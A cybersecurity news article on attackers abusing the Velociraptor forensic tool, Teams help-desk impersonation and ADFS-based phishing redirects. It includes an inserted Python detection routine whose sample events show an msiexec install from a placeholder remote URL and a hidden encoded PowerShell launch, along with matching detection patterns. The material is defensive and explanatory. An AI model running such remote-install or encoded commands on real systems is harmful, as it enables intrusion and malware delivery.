Cybercriminals Exploit Forensic Tool for C2 Access

Cybersecurity experts have uncovered a new wave of attacks where threat actors misuse legitimate software to infiltrate systems. One incident involved the open-source forensic tool Velociraptor, which was used to download and run Visual Studio Code, likely to establish a tunnel to a command-and-control server. 

This tactic reflects a shift in cybercrime strategy. Instead of deploying custom malware, attackers are now leveraging trusted incident response tools to gain access and avoid detection. Investigators found that the attackers used the Windows msiexec utility to install Velociraptor via a Cloudflare Workers domain, then used encoded PowerShell commands to enable remote access and code execution. 

Sophos warns that unauthorized use of Velociraptor should be treated as a potential precursor to ransomware. They recommend deploying endpoint detection systems, monitoring for unusual activity, and maintaining secure backups. 
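As an added illustration of the "monitoring for unusual activity" advice above (this is editor-written example code, not Sophos's or Velociraptor's), the following triage routine runs over constructed process-creation events and flags the three behaviours the article describes: msiexec pulling a package from a remote URL, Velociraptor running from outside an assumed approved install path, and PowerShell launched with an encoded command. All paths, hostnames and the base64 string are placeholders, not indicators from the incident.

```python
import re

# Constructed sample process-creation events (placeholder values, not indicators from the article).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec.exe /i https://placeholder-subdomain.workers.dev/agent.msi /qn"},
    {"image": r"C:\Users\Public\velociraptor.exe",
     "cmdline": "velociraptor.exe --config client.yaml client"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     # base64 of the UTF-16LE string "placeholder", i.e. a harmless constructed payload
     "cmdline": "powershell.exe -nop -w hidden -EncodedCommand cABsAGEAYwBlAGgAbwBsAGQAZQByAA=="},
    {"image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i C:\Temp\vendor-update.msi /qn"},
]

# Assumed allowlist: where the organisation's own IR deployment of Velociraptor lives.
APPROVED_VELOCIRAPTOR_PATHS = {r"c:\program files\velociraptor\velociraptor.exe"}

URL_RE = re.compile(r"^https?://([^/\s]+)", re.IGNORECASE)
# Common spellings of PowerShell's EncodedCommand switch.
ENC_FLAG_RE = re.compile(r"^-(e|ec|enc|encodedcommand)$", re.IGNORECASE)
BASE64_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")


def flag_event(event):
    """Return the reasons an event matches the tradecraft described in the article; [] if none."""
    image = event["image"].lower()
    exe = image.rsplit("\\", 1)[-1]
    args = event["cmdline"].split()
    reasons = []
    if exe == "msiexec.exe":
        for arg in args:
            m = URL_RE.match(arg)
            if m:
                reasons.append(f"msiexec fetching package from remote host {m.group(1)}")
    if exe == "velociraptor.exe" and image not in APPROVED_VELOCIRAPTOR_PATHS:
        reasons.append(f"Velociraptor running from unapproved path {event['image']}")
    if exe in {"powershell.exe", "pwsh.exe"}:
        for flag, value in zip(args, args[1:]):
            if ENC_FLAG_RE.match(flag) and BASE64_RE.match(value):
                reasons.append("PowerShell launched with an encoded command")
    return reasons


def triage(events):
    """Map each flagged event index to its reasons so a responder sees the whole chain together."""
    return {i: flag_event(e) for i, e in enumerate(events) if flag_event(e)}


if __name__ == "__main__":
    for i, reasons in triage(SAMPLE_EVENTS).items():
        print(i, SAMPLE_EVENTS[i]["cmdline"], "->", "; ".join(reasons))
```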

Meanwhile, researchers at Hunters and Permiso have reported a separate campaign targeting Microsoft Teams. Attackers impersonate IT support staff using fake or compromised accounts to trick users into installing remote access tools like AnyDesk or Quick Assist. These tools are then used to deliver PowerShell payloads capable of stealing credentials and executing malicious code. 

The lures are designed to appear routine, such as help desk messages about system maintenance, making them harder to detect. Similar techniques have been used to spread malware families like DarkGate and Matanbuchus.

Victims are also being tricked into entering passwords through fake Windows prompts, which are then saved locally for theft. Security teams are advised to monitor Teams audit logs and educate users on spotting impersonation attempts. 

In a related discovery, attackers have launched a malvertising campaign using legitimate office[.]com links and Active Directory Federation Services (ADFS) to redirect users to fake Microsoft 365 login pages. By configuring custom Microsoft tenants with ADFS, attackers can make malicious redirects appear legitimate, complicating detection efforts. 

Push Security calls this a troubling development, as it allows phishing pages to bypass traditional URL-based defenses. 
